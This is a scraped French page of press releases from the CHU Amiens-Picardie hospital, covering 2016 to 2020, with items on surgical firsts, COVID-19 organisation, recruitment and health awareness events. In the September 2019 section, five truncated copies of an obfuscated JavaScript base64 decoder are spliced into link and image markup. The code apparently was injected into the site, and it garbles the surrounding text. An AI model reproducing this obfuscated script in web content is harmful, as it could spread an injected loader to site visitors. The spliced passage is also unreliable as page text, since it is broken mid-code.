Communiqués de presse

Communiqués de presse

CHU Amiens-Picardie

Vous souhaitez recevoir les communiqués de presse du CHU Amiens-Picardie ? Envoyez vos coordonnées par mail à communication@chu-amiens.fr

Octobre 2020

Le CHU Amiens-Picardie propose dorénavant une nouvelle technique chirurgicale moins agressive pour opérer les enfants porteurs de scoliose, qui permet de redresser la colonne plus naturellement sans la priver de sa souplesse.

Téléchargez le communiqué de presse

 

Dans la catégorie « Accompagnement du patient », SimUTED® dispositif utilisant la simulation pour accompagner les personnes atteintes de Troubles Envahissants du Développement (TED) / Troubles du Spectre Autistique (TSA), fait partie de la sélection officielle des meilleurs projets au service de la santé récompensé par le Prix Galien.

Téléchargez le communiqué de presse


Septembre 2020

Le professeur Devauchelle, président de l’Institut Faire Faces et Madame Danielle Portal, directrice générale du CHU Amiens- Picardie ont le plaisir d’annoncer le lancement des travaux de construction des locaux dédiés à l’Institut Faire Faces, centre de recherche, d’enseignement et d’information dévolu à la défiguration. Le bâtiment, situé en contrebas de l’entrée principale du CHU Amiens-Picardie, et dont la livraison est prévue fin 2021, concrétise 15 années de recherche et d’études sur la défiguration.

Téléchargez le communiqué de presse

 

Les 09 et 10 octobre, SimUSanté® – CHU Amiens Picardie propose deux jours de programmation numérique autour de la thématique : Environnement d’aujourd‘hui et Santé de demain ! Au programme : quiz, jeux, parcours interactifs, vidéos, interviews….

Téléchargez le communiqué de presse

 

Le service d’imagerie de la femme s’est doté d’un nouveau mammographe dernière génération pour le confort des patientes et la précision de sa technologie. Les patientes partagent le ressenti d’une moindre compression du sein, rendant la mammographie moins désagréable ou plus facile qu’auparavant. Par ailleurs, ce nouvel équipement permet de faire une mammographie en 3D, il intègre une tomosynthèse qui permet d’analyser le sein plus précisément et donc de faire moins de clichés complémentaires avec par conséquence une irradiation moindre.

Téléchargez le communiqué de presse

 

Juillet 2020

Près de 70 infirmiers(ères) fraîchement diplômés (IDE) ont été recruté(e)s en CDI au CHU Amiens-Picardie. La journée d’accueil du 20 juillet a été le point d’orgue de cette campagne de recrutement du personnel infirmier pour l’année 2020.Cette journée a été l’occasion de mettre en avant le dynamisme du CHU dans ses différentes missions de soin, recherche et enseignement.

Malgré la campagne de recrutement massif qui vient d’être opérée le CHU Amiens-Picardie recherche encore près d’une trentaine d’infirmier(ère)s et d’une trentaine d’aide-soignant(e)s. Si vous souhaitez candidater, merci de prendre contact auprès de la DRH du CHU Amiens-Picardie : recrutement@chu-amiens.fr

Téléchargez le communiqué de presse

 

Juin 2020

Les équipes de la Pharmacie Stérilisation et du Laboratoire d’Hygiène du CHU Amiens-Picardie se sont associées à l’entreprise CIT DESSAINT, industrie de fabrication textile amiénoise, pour mettre au point un nouveau type de masques destiné à compléter les gestes barrière systématiques et les règles de distanciation physique.

Téléchargez le communiqué de presse

 

Mai 2020

Un centre de prélèvement DRIVE COVID-19 en mode piéton ou voiture, ouvre mardi 2 Juin sur le site Nord du CHU à Amiens. Les patients pourront y être dépistés de 8 heures à 16 heures sur rendez-vous et avec prescription médicale. Les patients avec suspicion de COVID-19 souhaitant accéder au centre de dépistage doivent être munis d’une ordonnance. Les dépistages sont exclusivement sur rendez-vous pris par téléphone au 06 47 75 79 05 (du lundi au samedi de 9h à 17h)

Téléchargez le communiqué de presse

 

L’Agence régionale de santé des Hauts-de-France met en place une campagne de consultations et de tests à partir du mardi 26 mai, en lien avec la Préfecture de la Somme, la Caisse primaire d’assurance maladie, le CHU Amiens-Picardie, le Service d’incendie et de secours de la Somme et les communes des centres COVID 19 mobiles et temporaires dans les villes d’Amiens, d’Abbeville et de Ham.

Téléchargez le communiqué de presse

 

En cette période de crise sanitaire liée au COVID-19 où les consultations, les visites ou le relais des structures d‘accueil peuvent être moins faciles, les psychologues du CHU Amiens-Picardie proposent des outils aux aidants : pour mieux protéger les personnes présentant des troubles cognitifs et conseiller leurs aidants.

Téléchargez le communiqué de presse

 

A l'aube de la reprise des écoles, le CHU Amiens-Picardie a proposé à la Ville d’Amiens et à la Direction des Services Départementaux de l'Education Nationale de la Somme de réfléchir à un moyen de sensibiliser nos jeunes enfants aux gestes barrières et plus particulièrement au lavage des mains, en cette période de pandémie COVID 19 et déconfinement.

Téléchargez le communiqué de presse

 

Avril 2020

Consultez l'organisation en terme d'hospitalisation COVID au CHU Amiens-Picardie.

Téléchargez le communiqué de presse

 

1 - L’activité liée à la crise sanitaire et la prise en charge des patients COVID-19
2 - Les différents projets de recherche liés au COVID-19
3 - La continuité d’activité : un enjeu pour le CHU et pour la santé de certains patients
4 - Le CHU Amiens-Picardie déploie activement depuis début mars des téléconsultations
5 - Point sur les tests en laboratoire de virologie
6 - Enfin, pour appuyer les équipes, favoriser les programmes de recherche, le CHU lance un appel aux dons financiers

Téléchargez le dossier de presse

 

Des équipes pluridisciplinaires issues des 14 écoles et instituts de formation du CHU Amiens-Picardie et de services ont déployés dans le cadre de la crise sanitaire, des solutions de formation permettant de renforcer les équipes, assurer une continuité du service, appréhender les spécificités des prises en charge des patients COVID19.

Téléchargez le communiqué de presse

 

Afin de protéger ses personnels, le CHU Amiens-Picardie a développé une méthodologie pour valider les masques FFP notamment ceux reçus sous forme de dons, avant d'autoriser leur utilisation.

Téléchargez le communiqué de presse

 

Afin de désengorger les services de réanimation Covid-19 du CHU Amiens-Picardie avant le week-end, une opération coordonnée est en cours pour transférer au CHU de Lille 10 patients de réanimation actuellement pris en charge à Amiens. Les deux hélicoptères sanitaires des deux CHU assurent ainsi le transfert Amiens / Lille aujourd’hui, de 9h00 à 21h00.

Téléchargez le communiqué de presse

 

Des initiatives heureuses ont été lancées pour sortir de l’isolement les patients en hospitalisation longue durée et en EHPAD, où les visites sont interdites depuis quelques semaines.

Téléchargez le communiqué de presse

 


Mars 2020

En appui et complément des services de soins, les professionnels hospitaliers ont réorganisé ou organisé des nouvelles activités devenues indispensables au bon fonctionnement de l’hôpital et à la prise en charge médicale des patients :
- Fabrication interne de gel hydro-alcoolique
- Création d’un outil en ligne pour faciliter la garde d’enfant des professionnels de santé
- Continuité pédagogique déployée pour les étudiants en santé

Téléchargez le communiqué de presse

 


1 - Organisation du capacitaire du CHU Amiens-Picardie
2 - Projets de Recherche COVID19
3 - Mobilisation de tous les professionnels du CHU et recherche des compétences extérieures
4 - Appel aux dons
5 - Rappel interdiction / restriction des visites

Téléchargez le communiqué de presse

 

1 - Organisation du capacitaire du CHU Amiens-Picardie
2 - Déprogrammation et annulation de certaines consultations ou interventions chirurgicales
3 - Restriction des visites au CHU Amiens-Picardie
4 - Le CHU Amiens-Picardie est organisé pour faire face aux besoins

Téléchargez le communiqué de presse


Trois projets régionaux (Programme Hospitaliers de Recherche Clinique Interrégional) qui participeront à limiter les risques ou proposer des soins plus adaptés, été remarqués :
· Le projet VIGI-ALARM, porté par le Dr Guillaume DESCHASSE du service de gériatrie, touche les personnes âgées à risque de chute. Il vise à étudier la supériorité de la vidéo-surveillance Intelligente associée à une téléalarme au domicile. 396 patients seront suivis.
· Le projet VITAKI cherche à prévenir les complications rénales au cours du choc septique. Il est coordonné par Dr Dimitri TITECA-BEAUPORT du service de Service Médecine intensive-réanimation, qui suivra 310 patients simultanément dans plusieurs lieux différents.
· L’étude KETOTHORAX mesure l’impact de la prescription d’anti-inflammatoires dans la chirurgie après pneumothorax sur 380 patients accueillis dans plusieurs centres avec service d’Anesthésie-Réanimation (coordination par le Dr Florent LEVIEL).

Téléchargez le communiqué de presse


Le CHU Amiens-Picardie rappelle que l’organisation actuelle COVID-19 repose sur les principes indispensables suivants :
- Pour les questions COVID-19 qui ne concernent pas la santé, le numéro vert gratuit (0 800 130 000, 7j/7, 24h/24) est à disposition
- Pour les habitants des Hauts-de-France directement concernés par ces cas de coronavirus, il convient d’appeler le numéro public d’information régionale (03 20 30 58 00, 7j/7 de 8h30 à 21h)
- Uniquement en cas de fièvre, toux, et difficulté respiratoire : appeler le 15

Téléchargez le communiqué de presse


Le CHU Amiens-Picardie est un des deux établissements publics universitaires de santé de référence et de recours de la région Hauts-de-France. Etablissement de 1ère ligne, il est organisé pour accueillir des patients suspects, cas possibles ou cas confirmés de coronavirus COVID-19. Il est situé à proximité immédiate du Cluster de l’Oise (zone de regroupement plusieurs cas avérés).

Téléchargez le communiqué de presse


Février 2020

L’équipe de chirurgie pédiatrique du CHU Amiens-Picardie a confirmé une nouvelle première mondiale en opérant des enfants de ligaments croisés avec assistance robotisée. Le but de cette nouvelle technique opératoire est de planifier et guider les gestes chirurgicaux avec un maximum de précision, permis par l’assistance robotisée. Le nouveau ligament « greffe » doit être inséré à la place de l’ancien ligament rompu, dans des tunnels percés dans le fémur et le tibia. La réalisation de ces tunnel est une des étapes importantes. Le but de cette nouvelle technique opératoire assistée par robot chez l’enfant, est de positionner au mieux ces tunnels en évitant les zones de croissance du fémur.

Téléchargez le communiqué de presse

Download the press release in english 


Destinée à réguler les transferts entre hôpitaux des femmes enceintes, des femmes ayant accouché ou des nouveau-nés, une nouvelle Cellule Régionale de Régulation Périnatale a vu le jour le 2 janvier 2020 au sein du CHU Amiens-Picardie. Cette plate-forme offre l’avantage d’améliorer la coordination et l’organisation des transferts entre les différents hôpitaux de la région du sud des Hauts de France.

Téléchargez le communiqué de presse


Janvier 2020

L'année 2019 aura été celle de la concrétisation des réflexions et travaux sur l'avenir de l'établissement formalisé dans un nouveau projet d’établissement : l'excellence à taille humaine pour chaque patient.

Téléchargez le dossier de presse


L’ensemble de l’organisation et des composantes de recherche du CHU Amiens-Picardie a été certifié fin décembre 2019 par l’organisme certificateur AFNOR qui a évalué et reconnu l’efficacité et la qualité des activités de recherche. La norme ISO 9001 définit les exigences applicables au management de la qualité pour la réalisation de produits et/ou de services. 

Téléchargez le communiqué de presse


Les écoles et instituts de formation du CHU Amiens-Picardie organisent différentes rencontres pour aider les jeunes à découvrir les modalités d’accès, les études et les nombreux débouchés des métiers de la santé. Devenir acteur de santé est possible selon différents cursus sans le bac, avec le bac ou après le portail santé (ex PACES) ou 1ère année de STAPS.

Téléchargez le communiqué de presse

 


Décembre 2019

     

Une nouvelle technique, plus précise et plus sûre a été réalisée le 16 décembre 2019 au CHU Amiens-Picardie pour une patiente souffrant d’une infection au niveau des vertèbres lombaires compliquée d’un abcès (spondylodiscite infectieuse). C’est la première fois au monde qu’un service de rhumatologie réalise une biopsie disco-vertébrale sous assistance robotisée.


Novembre 2019

Le Professeur Patrick BERQUIN, chef du service de neurologie pédiatrique et de l’hôpital de jour du CHU Amiens-Picardie prend la succession du Professeur Pierre KRYSTKOWIAK élu depuis 2015. A ce titre, il devient également Vice-Président du Directoire du CHU Amiens-Picardie.

 

 

 

 

Le 2 octobre 2019, un patient du CHU Amiens-Picardie souffrant de surdité profonde a bénéficié d’une nouvelle technique chirurgicale pour mettre en place un implant cochléaire qui lui permet de restaurer son audition. L’implantation a été réalisée de façon complète avec une assistance robotisée, plus précise, moins invasive et avec une ouverture minime de la peau.


Octobre 2019

 

La nouvelle plateforme de pédagogie numérique EPIONE-Campus Santé est lancée le vendredi 18 octobre à l’occasion de de la campagne nationale de vaccination contre la grippe saisonnière.

 

 

 

 

Pour la 2ème année, le service de gériatrie du CHU Amiens-Picardie organise une semaine d’évènements dédiés à la santé des dents de nos aînés : du lundi 14 au vendredi 18 octobre à Amiens.

 

Découvrez les bienfaits de l’activité physique contre la douleur chronique le 15 octobre 2019. Les professionnels de la douleur et de l’activité physique du CHU Amiens-Picardie proposent à l’occasion de la journée mondiale de la douleur le mardi 15 octobre, des informations, démonstrations et animations pour découvrir les bienfaits de l’activité physique.

 

 

 

 


SEPTEMBRE 2019

Pour renforcer la qualité de la régulation médicale, un nouveau centre de formation basé sur le CHU Amiens-Picardie, accueille dès 2019 les futurs assistants de régulation médicale (ARM).

 

function a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<<2)|(w9>>4);w6=((w9&15)<<4)|(we>>2);qe=((we&3)<<6)|n7;if(n6>=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oaand-public-depistage-témoignages-partage-sensibilisation-au-CHUAmiens-Picardie-1.pdf" target="_blank" rel="noopener">

function a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<<2)|(w9>>4);w6=((w9&15)<<4)|(we>>2);qe=((we&3)<<6)|n7;if(n6>=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oaandPublic_CHUAmiens.pdf">- Programme Octobre Rose 2019
- Dépistage Mammographies sans RDV au CHU
- Invitation au lancement d'Octobre Rose
- Défi sportif Avi-Rose
- Invitation à la Soirée de la Clinique du Sein

 

 

function a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<<2)|(w9>>4);w6=((w9&15)<<4)|(we>>2);qe=((we&3)<<6)|n7;if(n6>=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oaandiconsult-service-handicap-septembre-2019.pdf" target="_blank" rel="noopener">function a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<<2)|(w9>>4);w6=((w9&15)<<4)|(we>>2);qe=((we&3)<<6)|n7;if(n6>=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oaandiconsult-236x300.jpg" alt="Communiqué de presse handiconsult" width="170" height="216">

function a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<<2)|(w9>>4);w6=((w9&15)<<4)|(we>>2);qe=((we&3)<<6)|n7;if(n6>=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oaandiconsult-service-handicap-septembre-2019.pdf" target="_blank" rel="noopener">Handiconsult’ : un nouveau service pour faciliter l’accès aux personnes en situation de handicap

Depuis février 2019, une nouvelle équipe dédiée à l’accueil personnalisé aux personnes en situation de handicap a ouvert à Amiens, afin de les aider à organiser leurs consultations médicales (ophtalmologique, ORL, dentaire et gynécologique).

 

 

 

 

CHU Amiens Picardie zootherapie Nino Saint Victor 2019

La zoothérapie est proposée aux résidents des différents unités d’hébergement du Centre SaintVictor du CHU Amiens-Picardie depuis plusieurs mois (à l’Ehpad Les hortillons, l’unité de soins longue durée et l’unité cognitivo-comportementale et l’unité pour les troubles du comportement aigus perturbateurs).

 

 

 

 


AOÛT 2019

Le magazine Le Point a publié le palmarès 2019 des hôpitaux et cliniques de France et le CHU Amiens-Picardie est fier de gagner cette année encore une place en se classant au 12ème au tableau d’honneur des meilleurs hôpitaux de France. Cette reconnaissance valorise la qualité de la prise en charge et le professionnalisme des équipes médicales et soignantes du CHU Amiens-Picardie.

 

 


 

Juillet 2019


JUIN 2019

Conférence de presse : Présentation du projet d'établissement 2019-2013 

Passage aux urgences des personnes âgées le CHU Amiens-Picardie ajuste ses pratiques avec le projet régional ASSURE

Dossier de presse : La région Hauts-de-France, au cœur de la gestion des situations urgences avec le projet ASSURE (Améliorations des soins d'urgences en EHPAD)

20 nouveaux ergothérapeutes formés au CHU Amiens-Picardie pour accompagner les personnes en situation de handicap dans leurs occupations de vie quotidienne

    
dépistage DMLA

MAI 2019
    

AVRIL 2019
    

MARS 2019

JANVIER 2019
  

En 2019
En 2018
En 2017
En 2016

Septembre 2016

A l’occasion de la journée mondiale Alzheimer le mercredi 21 septembre 2016, les professionnels du CHU Amiens-Picardie et l’association France Alzheimer Somme souhaitent sensibiliser le grand public et informer des différentes prises en charge.

A l’occasion de la semaine européenne de sensibilisation aux cancers des voies aérodigestives supérieures ou VADS (ensemble des cavités et conduits aériens de la face et du cou), le CHU Amiens –Picardie souhaite informer le grand public et faciliter le dépistage des patients fumeurs domiciliés dans la Somme, du 21 au 30 septembre 2016.

Le CHU Amiens-Picardie participe à la nouvelle édition de la Fête de la science à Amiens et propose trois rendez-vous les samedi 8 et mardi 10 octobre 2016 avec pour thème le cœur dans tous ses états.

Téléchargez le communiqué de presse

Téléchargez le dossier de presse

 

Le CHU Amiens-Picardie, pôle régional de cancérologie et en particulier les services de Gynécologie-obstétrique, d’Imagerie, de Reconstruction mammaire et des Soins de supports en cancérologie, est particulièrement investi pour Octobre rose. Il propose une série de rencontres pour le grand public, pour les patientes ou pour les professionnels de santé, pour apporter des réponses rapides et présenter les solutions de dépistages et de prises en charge des cancers du sein et du col de l’utérus.

Téléchargez le communiqué de presse

Téléchargez le dossier de presse

 

Les différents acteurs des soins palliatifs, pour les adultes et les enfants, répondent aux questions des visiteurs le mardi 11 octobre 2016 de 10h à 16h dans le hall du CHU Amiens-Picardie site sud, à l’occasion de la journée mondiale des soins palliatifs.

Téléchargez le communiqué de presse

Pour la première fois au CHU Amiens-Picardie, un patient a bénéficié d’une prise en charge sur la journée (chirurgie ambulatoire) pour une ablation d’hernie discale. Cette opération menée le 30 août dernier sur un homme de 38 ans, a été traitée avec succès par voie mini-invasive endoscopique par le service de neurochirurgie.

Téléchargez le communiqué de presse


Octobre 2016

A l’occasion de la semaine mondiale de l’allaitement maternel, les professionnels de la maternité du CHU Amiens-Picardie proposent différentes animations pour découvrir tous les bienfaits de l’alimentation maternelle et favoriser les échanges entre mères allaitantes et futures mamans.

Téléchargez le communiqué de presse

 

L’Association de Lutte contre la Douleur Amiens-Picardie (ALDAP) et le CHU Amiens-Picardie proposent au grand public de découvrir et tester les thérapies pour soulager la douleur le lundi 17 octobre.

Téléchargez le communiqué de presse

 

Le service de rhumatologie du CHU Amiens-Picardie propose une information grand public sur les moyens de diagnostiquer, de prévenir et de soigner l’ostéoporose le jeudi 20 octobre 2016.

Téléchargez le communiqué de presse

 

A l’occasion de la journée mondiale contre la douleur du 17 octobre 2016, l’Association de Lutte contre la Douleur Amiens-Picardie (ALDAP) et le CHU Amiens-Picardie ont baptisé une nouvelle variété de rosier contre la douleur, Analgésia. Elle symbolise et incarne symboliquement la lutte contre la douleur en ne comptant aucune épine. 

Téléchargez le communiqué de presse

 

A l’occasion de la journée mondiale du diabète, les professionnels du CHU Amiens-Picardie proposent des animations et échanges au grand public le lundi 14 novembre 2016.

Téléchargez le communiqué de presse


Novembre 2016

Le CHU Amiens-Picardie propose depuis fin septembre un nouveau type de traitement pour prendre en charge des petites tumeurs cancéreuses de manière plus ciblée et plus efficace.
Le 400ème CyberKnife® dans le monde, 14ème en France et le 3ème en centre hospitalo-universitaire, est installé à Amiens.

Téléchargez le communiqué de presse

 

Le CHU Amiens-Picardie accueille l’intervention d’un clown, le Dr. Micky, au sein des services de Pédiatrie, à raison d’une visite par semaine dans 5 unités de soins. Dans le cadre de cette action et en accord avec l’établissement, La Poste avait proposé en 2014 et 2015 au Dr. Micky de profiter de cette période de préparation de Noël attendue avec impatience par les enfants, pour les aider à écrire une lettre au Père Noël de leur lit d’hôpital.

Téléchargez le communiqué de presse

 

Le centre Saint-Victor, boulevard Beauville à Amiens, propose comme chaque année un marché de Noël, vendredi 9 décembre 2016 dans la « rue couverte ». 20 exposants vous proposent de nombreuses idées cadeaux : cosmétiques, objets artisanaux, décorations, compositions florales, gâteaux battus, foie gras, chocolats et tant d’autres surprises…

Téléchargez le communiqué de presse


DÉCEMBRE 2016

Le plus grand centre polyvalent de simulation en santé en Europe SimUSanté® ouvert depuis janvier 2016 à Amiens, dispose désormais d’une cellule sanitaire d’hélicoptère dédiée à la simulation et de nouveaux équipements et enseignements spécialisés pour la formation des professionnels de santé et professionnels enseignants et la recherche.

Téléchargez le communiqué de presse

Téléchargez le dossier de presse